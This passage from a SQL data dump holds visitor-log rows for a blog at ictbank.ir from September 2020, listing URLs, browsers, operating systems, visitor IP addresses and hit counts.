(4896,'2020-09-15','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.32.235.9','000',0,1,0),
(4897,'2020-09-15','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','5.231.88.199','000',0,2,0),
(4898,'2020-09-15','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,1,0),
(4899,'2020-09-15','http://ictbank.ir/blog','WeChat','iOS','10.3.3',NULL,NULL,'','182.254.166.136','000',0,4,0),
(4900,'2020-09-15','http://82.102.9.14:80/blog','Chrome','Windows','5.1',NULL,NULL,'','180.149.125.166','000',0,1,0),
(4901,'2020-09-16','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','35.239.143.173','000',0,1,0),
(4902,'2020-09-16','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','176.193.132.244','000',0,1,0),
(4903,'2020-09-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.196.142.255','000',0,1,0),
(4904,'2020-09-16','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','103.149.192.14','000',0,1,0),
(4905,'2020-09-16','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','110.229.223.72','000',0,1,0),
(4906,'2020-09-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.185.127.110','000',0,1,0),
(4907,'2020-09-16','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.13.156.83','000',0,1,0),
(4908,'2020-09-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.127.222.109','000',0,1,0),
(4909,'2020-09-16','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','110.229.220.109','000',0,1,0),
(4910,'2020-09-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.236.72.170','000',0,1,0),
(4911,'2020-09-16','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.186','000',0,3,0),
(4912,'2020-09-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','103.97.100.15','000',0,1,0),
(4913,'2020-09-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','23.91.70.54','000',0,1,0),
(4914,'2020-09-16','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.32.235.9','000',0,1,0),
(4915,'2020-09-16','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.23.131','000',0,1,0),
(4916,'2020-09-16','http://ictbank.ir/blog','Opera','Windows','5.1',NULL,NULL,'','91.241.19.182','000',0,1,0),
(4917,'2020-09-16','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(4918,'2020-09-16','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','62.210.92.175','000',0,1,0),
(4919,'2020-09-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','62.210.185.4','000',0,2,0),
(4920,'2020-09-17','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.186','000',0,3,0),
(4921,'2020-09-17','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,1,0),
(4922,'2020-09-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.59.55.246','000',0,1,0),
(4923,'2020-09-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','129.226.60.231','000',0,1,0),
(4924,'2020-09-17','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','183.60.141.171','000',0,1,0),
(4925,'2020-09-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.217.213.24','000',0,1,0),
(4926,'2020-09-17','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','41.155.205.64','000',0,3,0),
(4927,'2020-09-17','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','193.106.30.99','000',0,1,0),
(4928,'2020-09-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','110.77.248.232','000',0,39,0),
(4929,'2020-09-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.158.125.106','000',0,1,0),
(4930,'2020-09-17','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(4931,'2020-09-17','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','101.21.149.51','000',0,1,0),
(4932,'2020-09-17','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,1,0),
(4933,'2020-09-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.35.29.40','000',0,1,0),
(4934,'2020-09-17','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','122.51.227.85','000',0,2,0),
(4935,'2020-09-17','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.23.131','000',0,1,0),
(4936,'2020-09-17','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.32.235.9','000',0,1,0),
(4937,'2020-09-17','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','188.165.208.7','000',0,2,0),
(4938,'2020-09-18','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','62.210.92.175','000',0,1,0),
(4939,'2020-09-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.28.82.248','000',0,1,0),
(4940,'2020-09-18','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.142.236.40','000',0,1,0),
(4941,'2020-09-18','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,1,0),
(4942,'2020-09-18','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.186','000',0,6,0),
(4943,'2020-09-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.202.146.168','000',0,1,0),
(4944,'2020-09-18','http://ictbank.ir/blog','Chrome','Windows','6.4',NULL,NULL,'','159.89.115.29','000',0,1,0),
(4945,'2020-09-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.126.118.43','000',0,1,0),
(4946,'2020-09-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','129.226.60.231','000',0,4,0),
(4947,'2020-09-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.70.86.234','000',0,1,0),
(4948,'2020-09-18','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','185.111.18.162','000',0,1,0),
(4949,'2020-09-18','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','18.130.29.115','000',0,1,0),
(4950,'2020-09-18','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.32.235.9','000',0,1,0),
(4951,'2020-09-18','http://ictbank.ir/blog','Chrome','OS X','10.15.2',NULL,NULL,'','206.81.12.65','000',0,1,0),
(4952,'2020-09-18','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','84.21.170.210','000',0,1,0),
(4953,'2020-09-18','http://mail.design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','107.6.169.250','000',0,1,0),
(4954,'2020-09-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','184.168.46.121','000',0,2,0),
(4955,'2020-09-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','195.97.222.92','000',0,1,0),
(4956,'2020-09-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','104.238.120.40','000',0,1,0),
(4957,'2020-09-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','117.103.81.124','000',0,1,0),
(4958,'2020-09-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','5.63.10.250','000',0,1,0),
(4959,'2020-09-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','184.168.152.187','000',0,1,0),
(4960,'2020-09-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','182.50.130.8','000',0,1,0),
(4961,'2020-09-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','188.65.115.194','000',0,1,0),
(4962,'2020-09-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.62.176.125','000',0,1,0),
(4963,'2020-09-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.71.239.32','000',0,2,0),
(4964,'2020-09-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','184.168.193.98','000',0,1,0),
(4965,'2020-09-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','188.165.222.148','000',0,1,0),
(4966,'2020-09-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','51.161.116.175','000',0,1,0),
(4967,'2020-09-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.71.239.33','000',0,1,0),
(4968,'2020-09-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.125.159.60','000',0,1,0),
(4969,'2020-09-19','http://ictbank.ir/blog/index.php/2020/02/25/connection-encryption-in-oracle-database/','Opera','Windows','6.1',NULL,NULL,'','45.141.156.20','000',0,2,0),
(4970,'2020-09-19','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','175.24.88.103','000',0,2,0),
(4971,'2020-09-19','http://ictbank.ir/blog/','Opera','Windows','6.1',NULL,NULL,'','37.120.194.45','000',0,2,0),
(4972,'2020-09-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','129.226.60.231','000',0,5,0),
(4973,'2020-09-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.147.141','000',0,1,0),
(4974,'2020-09-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','45.40.166.150','000',0,1,0),
(4975,'2020-09-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.71.238.12','000',0,1,0),
(4976,'2020-09-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.71.239.40','000',0,1,0),
(4977,'2020-09-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','184.168.152.132','000',0,1,0),
(4978,'2020-09-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','118.69.172.7','000',0,1,0),
(4979,'2020-09-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','149.202.188.175','000',0,1,0),
(4980,'2020-09-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.153.30','000',0,1,0),
(4981,'2020-09-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','184.168.27.206','000',0,1,0),
(4982,'2020-09-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','190.228.29.221','000',0,1,0),
(4983,'2020-09-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.209.166.8','000',0,1,0),
(4984,'2020-09-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','157.230.130.85','000',0,1,0),
(4985,'2020-09-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','174.136.13.178','000',0,1,0),
(4986,'2020-09-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','107.189.7.27','000',0,1,0),
(4987,'2020-09-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','97.74.24.214','000',0,1,0),
(4988,'2020-09-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','184.168.152.15','000',0,1,0),
(4989,'2020-09-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.212.68.164','000',0,1,0),
(4990,'2020-09-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.184.239.163','000',0,1,0),
(4991,'2020-09-19','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','109.110.235.80','000',0,1,0),
(4992,'2020-09-19','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,1,0),
(4993,'2020-09-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.219.175.231','000',0,1,0),
(4994,'2020-09-19','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','3.81.245.94','000',0,1,0),
(4995,'2020-09-19','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.186','000',0,3,0),
(4996,'2020-09-19','http://ictbank.ir/blog','WeChat','iOS','10.3.3',NULL,NULL,'','182.254.166.136','000',0,4,0),
(4997,'2020-09-19','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.39.113','000',0,1,0),
(4998,'2020-09-19','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','18.130.29.115','000',0,1,0),
(4999,'2020-09-19','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(5000,'2020-09-19','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','103.140.79.238','000',0,1,0),
(5001,'2020-09-20','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','91.241.19.182','000',0,1,0),
(5002,'2020-09-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.159.101.83','000',0,1,0),
(5003,'2020-09-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','114.202.2.198','000',0,1,0),
(5004,'2020-09-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.154.27','000',0,2,0),
(5005,'2020-09-20','http://mail.design-arena.ir/blog','Firefox','Linux','Unknown',NULL,NULL,'','159.89.230.105','000',0,2,0),
(5006,'2020-09-20','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','5.188.211.21','000',0,2,0),
(5007,'2020-09-20','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','5.188.211.13','000',0,2,0),
(5008,'2020-09-20','http://ictbank.ir/blog','Chrome','OS X','10.12.5',NULL,NULL,'','168.151.115.233','000',0,1,0),
(5009,'2020-09-20','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.186','000',0,3,0),
(5010,'2020-09-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.216.223.41','000',0,1,0),
(5011,'2020-09-20','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','5.188.211.35','000',0,2,0),
(5012,'2020-09-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.93.81.210','000',0,1,0),
(5013,'2020-09-20','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','139.199.94.100','000',0,2,0),
(5014,'2020-09-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.167.49.212','000',0,1,0),
(5015,'2020-09-20','http://ictbank.ir/blog','Chrome','OS X','10.12.5',NULL,NULL,'','179.61.161.91','000',0,1,0),
(5016,'2020-09-20','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','5.188.211.14','000',0,4,0),
(5017,'2020-09-20','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.154.235','000',0,1,0),
(5018,'2020-09-20','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.23.131','000',0,1,0),
(5019,'2020-09-20','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','5.188.211.10','000',0,2,0),
(5020,'2020-09-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','129.226.60.231','000',0,1,0),
(5021,'2020-09-21','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','5.188.211.16','000',0,2,0),
(5022,'2020-09-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.137.172.48','000',0,1,0),
(5023,'2020-09-21','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.186','000',0,6,0),
(5024,'2020-09-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.93.74.55','000',0,1,0),
(5025,'2020-09-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','54.37.254.102','000',0,1,0),
(5026,'2020-09-21','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,1,0),
(5027,'2020-09-21','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','144.168.162.250','000',0,1,0),
(5028,'2020-09-21','http://design-arena.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','159.203.93.122','000',0,1,0),
(5029,'2020-09-21','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','5.188.211.24','000',0,4,0),
(5030,'2020-09-21','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','144.91.95.177','000',0,1,0),
(5031,'2020-09-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.158.241.174','000',0,1,0),
(5032,'2020-09-21','http://ictbank.ir/blog','Chrome','OS X','10.9.2',NULL,NULL,'','62.171.148.95','000',0,1,0),
(5033,'2020-09-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.209.93.163','000',0,1,0),
(5034,'2020-09-21','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(5035,'2020-09-21','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(5036,'2020-09-21','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','198.143.158.178','000',0,1,0),
(5037,'2020-09-21','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.196.164','000',0,1,0),
(5038,'2020-09-21','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.39.113','000',0,1,0),
(5039,'2020-09-21','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','80.82.68.114','000',0,1,0),
(5040,'2020-09-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','82.99.229.34','000',0,1,0),
(5041,'2020-09-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.192.68.81','000',0,1,0),
(5042,'2020-09-22','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','5.188.211.13','000',0,20,0),
(5043,'2020-09-22','http://ictbank.ir/blog/index.php/2020/02/25/connection-encryption-in-oracle-database/','Chrome','Windows','6.3',NULL,NULL,'','45.141.156.17','000',0,2,0),
(5044,'2020-09-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.68.155.25','000',0,1,0),
(5045,'2020-09-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.185.118.237','000',0,1,0),
(5046,'2020-09-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.25.123.222','000',0,1,0),
(5047,'2020-09-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.153.29','000',0,2,0),
(5048,'2020-09-22','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,1,0),
(5049,'2020-09-22','http://design-arena.ir/blog/','Chrome','Windows','6.1',NULL,NULL,'','84.17.51.43','000',0,1,0),
(5050,'2020-09-22','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.32.235.9','000',0,1,0),
(5051,'2020-09-22','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.23.131','000',0,1,0),
(5052,'2020-09-22','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','176.113.115.214','000',0,3,0),
(5053,'2020-09-23','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,1,0),
(5054,'2020-09-23','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','183.60.141.171','000',0,1,0),
(5055,'2020-09-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.192.106.86','000',0,1,0),
(5056,'2020-09-23','http://www.ictbank.ir/blog/','Android Browser','Android','2.2',NULL,NULL,'','220.181.77.162','000',0,1,0),
(5057,'2020-09-23','http://ictbank.ir/blog','Opera','Windows','5.1',NULL,NULL,'','91.241.19.182','000',0,1,0),
(5058,'2020-09-23','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(5059,'2020-09-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.189.179.88','000',0,1,0),
(5060,'2020-09-23','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','89.21.77.158','000',0,1,0),
(5061,'2020-09-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.192.207.143','000',0,1,0),
(5062,'2020-09-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.132.214.20','000',0,1,0),
(5063,'2020-09-23','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','148.251.182.88','000',0,1,0),
(5064,'2020-09-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.190.110.156','000',0,1,0),
(5065,'2020-09-23','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.39.113','000',0,1,0),
(5066,'2020-09-23','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.23.131','000',0,1,0),
(5067,'2020-09-23','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','81.132.43.216','000',0,1,0),
(5068,'2020-09-23','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','110.229.217.195','000',0,1,0),
(5069,'2020-09-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.156.134','000',0,1,0),
(5070,'2020-09-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','182.50.130.134','000',0,1,0),
(5071,'2020-09-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','46.182.5.30','000',0,1,0),
(5072,'2020-09-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','97.74.24.211','000',0,1,0),
(5073,'2020-09-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','81.88.49.16','000',0,1,0),
(5074,'2020-09-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.147.143','000',0,1,0),
(5075,'2020-09-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','103.97.100.15','000',0,1,0),
(5076,'2020-09-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','203.78.107.130','000',0,1,0),
(5077,'2020-09-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','82.166.143.97','000',0,1,0),
(5078,'2020-09-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','176.61.147.129','000',0,1,0),
(5079,'2020-09-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','79.170.40.231','000',0,1,0),
(5080,'2020-09-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.147.132','000',0,1,0),
(5081,'2020-09-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','184.168.152.164','000',0,1,0),
(5082,'2020-09-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.184.215.83','000',0,1,0),
(5083,'2020-09-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','213.184.241.203','000',0,1,0),
(5084,'2020-09-24','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','42.56.89.142','000',0,3,0),
(5085,'2020-09-24','http://ictbank.ir/blog','Chrome','OS X','10.9.2',NULL,NULL,'','123.121.144.168','000',0,13,0),
(5086,'2020-09-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.221.198.167','000',0,1,0),
(5087,'2020-09-24','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','193.106.30.99','000',0,1,0),
(5088,'2020-09-24','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','101.227.1.198','000',0,1,0),
(5089,'2020-09-24','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.17.3.88','000',0,1,0),
(5090,'2020-09-24','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,1,0),
(5091,'2020-09-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.157.81.254','000',0,1,0),
(5092,'2020-09-24','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','154.113.16.226','000',0,3,0),
(5093,'2020-09-24','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','104.129.3.243','000',0,56,0),
(5094,'2020-09-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.237.102.119','000',0,1,0),
(5095,'2020-09-24','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','185.191.204.4','000',0,1,0),
(5096,'2020-09-24','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.32.235.9','000',0,1,0),
(5097,'2020-09-24','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.229.226','000',0,1,0),
(5098,'2020-09-24','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','176.113.115.214','000',0,3,0),
(5099,'2020-09-24','ictbank.ir','Chrome','Windows','6.0',NULL,NULL,'','162.243.126.96','000',0,2,0),
(5100,'2020-09-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','78.155.218.95','000',0,1,0),
(5101,'2020-09-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.194.244.89','000',0,1,0),
(5102,'2020-09-25','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(5103,'2020-09-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','74.142.232.241','000',0,2,0),
(5104,'2020-09-25','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','103.145.13.216','000',0,1,0),
(5105,'2020-09-25','design-arena.ir','Chrome','Windows','6.0',NULL,NULL,'','54.36.246.232','000',0,2,0),
(5106,'2020-09-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','62.210.92.175','000',0,1,0),
(5107,'2020-09-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.221.49.72','000',0,1,0),
(5108,'2020-09-25','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','176.113.115.214','000',0,3,0),
(5109,'2020-09-25','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,1,0),
(5110,'2020-09-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.125.51.72','000',0,1,0),
(5111,'2020-09-25','http://ictbank.ir/blog/index.php/2020/02/25/connection-encryption-in-oracle-database/','Chrome','Windows','6.1',NULL,NULL,'','157.97.132.46','000',0,2,0),
(5112,'2020-09-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.88.142.145','000',0,1,0),
(5113,'2020-09-25','http://82.102.9.14:80/blog','Firefox','Windows','6.0',NULL,NULL,'','42.194.142.186','000',0,1,0),
(5114,'2020-09-25','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','72.255.7.118','000',0,1,0),
(5115,'2020-09-25','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','18.130.29.115','000',0,1,0),
(5116,'2020-09-25','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.32.235.9','000',0,1,0),
(5117,'2020-09-25','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','72.210.252.135','000',0,1,0),
(5118,'2020-09-25','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','89.216.102.123','000',0,1,0),
(5119,'2020-09-26','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','195.66.114.153','000',0,1,0),
(5120,'2020-09-26','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','138.197.151.177','000',0,2,0),
(5121,'2020-09-26','http://ictbank.ir/blog','Chrome','Windows','6.4',NULL,NULL,'','138.197.158.232','000',0,1,0),
(5122,'2020-09-26','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','176.113.115.214','000',0,6,0),
